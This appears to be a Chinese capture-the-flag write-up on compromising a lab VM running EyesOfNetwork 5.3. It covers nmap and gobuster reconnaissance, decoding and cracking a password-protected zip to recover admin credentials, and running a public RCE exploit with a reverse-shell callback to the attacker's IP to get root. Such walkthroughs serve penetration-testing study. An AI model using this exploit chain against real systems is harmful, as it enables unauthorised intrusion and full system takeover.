主机发现
nmap -sP 192.168.159.0/24
目标靶机IP为:192.168.159.185
端口扫描
nmap -sV -p- -A 192.168.159.185
开放端口为:22、66、80、111、443、2403、3306、8086
66端口
目录扫描
gobuster dir -u http://192.168.159.185:66 \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
发现了可疑文件:eon
访问下载查看,怀疑是base64编码,尝试解码
UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU
Rw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA
AABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA
AQBbAAAARgAAAAAA
发现是一堆乱码。。。
压缩包操作
但是从解码出来的字符看,里面有一个 creds.txt
文件;并且这个字符串是以 PK
开头的,那有没有可能它是把一个压缩包进行了编码?
尝试了一下,确实是压缩包的格式
直接将base4输出的内容写入1.zip
文件中
echo 'UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU
Rw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA
AABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA
AQBbAAAARgAAAAAA' -n | base64 -d > 1.zip
虽然提示有误,但是却生成出来了(也可以用脚本做,把解码出来的数据以二进制形式写入文件,应该更标准)
解压压缩包,发现存在密码
破解密码
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 1.zip
获得密码,再次解压文件
查看解压出来的文件,发现一组用户名和密码
admin;isitreal31__
80端口
直接访问80页面,发现是一个登陆页面,尝试获得的账号密码
成功登录后台
在后台发现这个网站是一个 cms,且找到了版本号
反弹shell
先查找本地漏洞库,发现有一个 REC 漏洞
searchsploit EyesOfNetwork 5.3
查看,发现是一个python脚本
searchsploit -m 48025.txt
cat 48025.txt
转为python,查看参数,运行
cp 48025.txt 111.py
vi 111.py
python3 111.py https://192.168.159.185 -ip 192.168.159.131 -port 7777 -user admin -password isitreal31__
成功获取shell
这台靶机的 web 服务直接就是 root 起的,不需要提权了。。。